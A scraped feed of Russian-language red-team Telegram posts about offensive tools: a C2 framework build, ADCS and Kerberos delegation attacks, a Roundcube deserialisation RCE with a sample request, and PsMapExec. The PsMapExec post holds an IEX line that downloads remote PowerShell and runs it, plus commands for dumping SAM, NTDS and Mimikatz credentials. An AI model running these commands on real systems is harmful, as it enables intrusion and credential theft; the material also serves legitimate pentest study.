Большой обзор (english)
Server/Client Architecture for Multiplayer Support
Cross-platform GUI client
Fully encrypted communications
Listener and Agents as Plugin (Extender)
Client extensibility for adding new tools
Task and Jobs storage
Files and Process browsers
Socks4 / Socks5 / Socks5 Auth support
Local and Reverse port forwarding support
BOF support
Linking Agents and Sessions Graph
Agents Health Checker
Agents KillDate and WorkingTime control
Windows/Linux/MacOs agents support
Remote Terminal
sudo apt install golang-1.23 mingw-w64 make
sudo ln -s /usr/lib/go-1.23/bin/go /usr/local/bin/go
sudo apt install make cmake libssl-dev qt6-base-dev qt6-websockets-dev
git clone https://github.com/Adaptix-Framework/AdaptixC2.git
cd AdaptixC2
make server
make extenders
make client
cd dist
chmod +x ssl_gen.sh
./ssl_gen.sh
./adaptixserver -profile profile.json
./AdaptixClient
#adaptixc2 #redteam #soft
Please open Telegram to view this post
VIEW IN TELEGRAM
Для кодинга на
Вот так и нашел OpenIDE, построена на базе IntelliJ IDEA, по умолчанию поддерживает Java и Kotlin (эти оба два не особо интересны😁), но после установки плагина Python Community Edition превращается в родную и любимую IDE. Обещают подвести поддержку Go и Rust, будет совсем хорошо
В общем мне зашло, могу рекомендовать
#openide #ide #soft
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - bregman-arie/devops-exercises: Linux, Jenkins, AWS, SRE, Prometheus, Docker, Python, Ansible, Git, Kubernetes, Terraform…
Linux, Jenkins, AWS, SRE, Prometheus, Docker, Python, Ansible, Git, Kubernetes, Terraform, OpenStack, SQL, NoSQL, Azure, GCP, DNS, Elastic, Network, Virtualization. DevOps Interview Questions - bre...
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from 1N73LL1G3NC3
Delegations
A tool to work with all types of Kerberos delegations (unconstrained, constrained, and resource-based constrained delegations) in Active Directory.
Audit mode:
Add mode:
Find mode:
Clear mode:
Remove mode:
Monitor mode:
A tool to work with all types of Kerberos delegations (unconstrained, constrained, and resource-based constrained delegations) in Active Directory.
Audit mode:
◦ Audit existing unconstrained delegations
◦ Audit existing constrained delegations with or without protocol transition
◦ Audit existing resource-based constrained delegations
Add mode:
◦ Add new unconstrained delegations
◦ Add new constrained delegations with or without protocol transition
◦ Add new resource-based constrained delegations
Find mode:
◦ Find unconstrained delegations
◦ Find constrained delegations with or without protocol transition
◦ Find resource-based constrained delegations
Clear mode:
◦ Clear existing unconstrained delegations
◦ Clear existing constrained delegations with or without protocol transition
◦ Clear existing resource-based constrained delegations
Remove mode:
◦ Remove existing unconstrained delegations
◦ Remove existing constrained delegations with or without protocol transition
◦ Remove existing resource-based constrained delegations
Monitor mode:
◦ Monitor modifications of all types of delegations in real-time
• Protocol transition mode:
◦ Add protocol transition on a constrained delegation
◦ Remove protocol transition on a constrained delegation
Forwarded from Offensive Xwitter
😈 [ Aditya Telange @adityatelange ]
evil-winrm-py v1 released🌟
🔗 https://github.com/adityatelange/evil-winrm-py/releases/tag/v1.0.0
🐥 [ tweet ]
evil-winrm-py v1 released🌟
🔗 https://github.com/adityatelange/evil-winrm-py/releases/tag/v1.0.0
🐥 [ tweet ]
Хороший товарищ пишет рецензию, очень подробный отзыв по курсу в целом и экзамену в частности
Будет ли вам интересен данный материал ? Если да, то ставим Гэндальфа
Коротко о курсе:
Интенсивный обучающий курс, который охватывает широкий спектр техник и инструментов для проведения пентеста
#htb #cert #exam
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Ralf Hacker Channel (Ralf Hacker)
Полный гайд по эксплуатации ADCS от ESC1 до ESC16. Понятно, что материалов по этой теме и так много, но пусть будет под рукой))
https://xbz0n.sh/blog/adcs-complete-attack-reference
#ad #adcs #privesc #pentest #redteam
https://xbz0n.sh/blog/adcs-complete-attack-reference
#ad #adcs #privesc #pentest #redteam
xbz0n.sh
Breaking ADCS: ESC1 to ESC16 Attack Techniques
Let's talk about Active Directory Certificate Services. If you've been doing red team work for any length of time, you've probably heard about ADCS attacks. ...
Google Docs
ADCS Attack Techniques Cheatsheet
И в дополнение к предыдущему посту, сравнительная табличка по инструментам
Отличная шпаргалка по атакам на ADCS
Разобраны основные инструменты для проверки и эксплуатации уязвимостей
#adcs #active_directory #windows #esc #pentest
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥7 1
Forwarded from Пакет Безопасности
Красивое
TAdviser сделал карту кибератак, нацеленных на Россию. Тут и цветовая разбивка по источникам, и разделение по сферам деятельности целей атак, и даже конкретные хакерские группировки указаны. Ну и описание всего этого тоже есть.
Так что смотрим, изучаем, делимся.
⚡ Пакет Безопасности | 💬 Чат
🛍 Другие каналы
TAdviser сделал карту кибератак, нацеленных на Россию. Тут и цветовая разбивка по источникам, и разделение по сферам деятельности целей атак, и даже конкретные хакерские группировки указаны. Ну и описание всего этого тоже есть.
Так что смотрим, изучаем, делимся.
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥1
Forwarded from Cybred
🔥 9.9 Critical
Post Auth RCE для Roundсube
Небезопасная десериализация. Инжектится через GET-параметр
Пошагово, как работает эксплоит:
1. Подменяет
2. Заинжекченное значение подтягивается в сессию.
3. Дальше оно обрабатывается через
4. Во время вызова GPG-логики, Roundcube вызывает
5. Триггерится код из первого шага
exploit // nuclei // research
Post Auth RCE для Roundсube
Небезопасная десериализация. Инжектится через GET-параметр
_from, — в Roundcube он указывает на раздел, куда надо вернуться, после отправки сообщения. ?_task=settings&_action=upload&_from=mail%2Finbox
Пошагово, как работает эксплоит:
1. Подменяет
_from сериализованным объектом.2. Заинжекченное значение подтягивается в сессию.
3. Дальше оно обрабатывается через
rcube_pgp_engine → Crypt_GPG_Engine.4. Во время вызова GPG-логики, Roundcube вызывает
unserialize().5. Триггерится код из первого шага
exploit // nuclei // research
Курируемый список инструментов с BlackHat конференций, сгруппированный по событию (USA, Europe, Asia), году и категории
➡️ Miscellaneous / Lab Tools➡️ Web/AppSec➡️ Web/AppSec or Red Teaming➡️ Red Teaming➡️ Red Teaming / AppSec➡️ Blue Team & Detection➡️ Reverse Engineering➡️ OSINT
#tools #blackhat #event
Please open Telegram to view this post
VIEW IN TELEGRAM
Простой скрипт для извлечения полезных данных из Neo4j базы, которую использует Bloodhound
Наглядно выводит информацию в консоль, коротко и по делу
python3 bhqc.py -h
python3 bhqc.py -p passwordNeo4JHere -d domain.local --heavy
#redteam #bloodhound #soft #python
Please open Telegram to view this post
VIEW IN TELEGRAM
👍2 1
Решения задач на прошедший VKACTF, в котором приняли участие и заняли 2ое место
#ctf #vkactf2025
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥5 1
Отличный инструмент для пост эксплуатации в
UPD. 0.8.0
Добавили 2 метода:
LDAP / LDAPS
SSH - для дампа ключей
Начиная с версии 0.6.0, PsMapExec больше не имеет каких-либо внешних зависимостей, кроме модуля Amnesiac.
PsMapExec теперь можно запускать в ограниченных средах, таких как экзаменационные лаборатории или машины CTF
Текущая поддержка методов (протоколов):
🔵 RDP🔵 SessionHunter🔵 SMB🔵 SMB Signing🔵 LDAP / LDAPS🔵 SSH🔵 Spraying🔵 VNC🔵 WinRM🔵 WMI🔵 MSSQL🔵 Kerberoast
Реализованные модули:
🔵 Amnesiac - выполнение Amnesiac C2 пейлоадов🔵 ConsoleHistory - история в PowerShell🔵 Files - файлы в типичных директориях🔵 KerbDump - дамп Kerberos билетов🔵 eKeys - дамп ключей (Mimikatz)🔵 LogonPasswords - дамп logon passwords (Mimikatz)🔵 LSA - дамп LSA (Mimikatz)🔵 NTDS - реализация DCsync🔵 SAM - дамп SAM
Запуск из памяти:
IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/The-Viper-One/PME-Scripts/main/Invoke-NETMongoose.ps1");IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/The-Viper-One/PsMapExec/main/PsMapExec.ps1")Примеры:
# Текущий пользователь
PsMapExec -Targets All -Method [Method]
# С паролем
PsMapExec -Targets All -Method [Method] -Username [Username] -Password [Password]
# С хешем
PsMapExec -Targets All -Method [Method] -Username [Username] -Hash [RC4/AES256]
# С билетом
PsMapExec -Targets All -Method [Method] -Ticket [doI.. OR Path to ticket file]
# Дамп SAM файла
PsMapExec -Targets DC.domain.local -Method SMB -Ticket [Base64-Ticket] -Module SAM
# Kerberoasting
PsMapExec -Method Kerberoast -ShowOutput
# Использование модулей
PsMapExec -Targets All -Method [Method] -Module [Module]
#soft #pentest #powershell #psmapexec #redteam #windows
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥3 2 1
Инструмент для удаленного выполнения команд в
Service Control Manager (MS-SCMR)
Task Scheduler (MS-TSCH)
Distributed Component Object Model (MS-DCOM)
Windows Management Instrumentation (MS-WMI)
#goexec #redteam #soft #golang
Please open Telegram to view this post
VIEW IN TELEGRAM
Telegram
Whitehat Lab
🙃 HTB Certified Active Directory Pentesting Expert (HTB CAPE)
Хороший товарищ пишет рецензию, очень подробный отзыв по курсу в целом и экзамену в частности
Будет ли вам интересен данный материал ? Если да, то ставим Гэндальфа 🧙
🔗 HTB CAPE
Коротко о курсе:…
Хороший товарищ пишет рецензию, очень подробный отзыв по курсу в целом и экзамену в частности
Будет ли вам интересен данный материал ? Если да, то ставим Гэндальфа 🧙
🔗 HTB CAPE
Коротко о курсе:…
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥6 2🤝1
Продвинутый REST API фаззер с высокой скоростью работы. Строит HTML отчеты по окончании. Очень подробная документация на официальном сайте. Написан на
Запуск в режиме black box:
cats --contract=openapi.yml -H "Authorization=$token" --server=https://api-url.com -b -k
Запуск в режиме context mode:
cats --contract=openapi.yaml --server=https://localhost:8080 --headers=headers.yml --refData=referenceData.yml
Запуск в режиме continuous fuzzing:
cats random --contract=openapi.yaml --server=https://localhost:8080 -H "API-KEY=$token" --mc 500 --path "/users/auth" -X POST --stopAfterTimeInSec 10
📚 Тестируем Github API с CATS
#soft #cats #java #fuzzer
Please open Telegram to view this post
VIEW IN TELEGRAM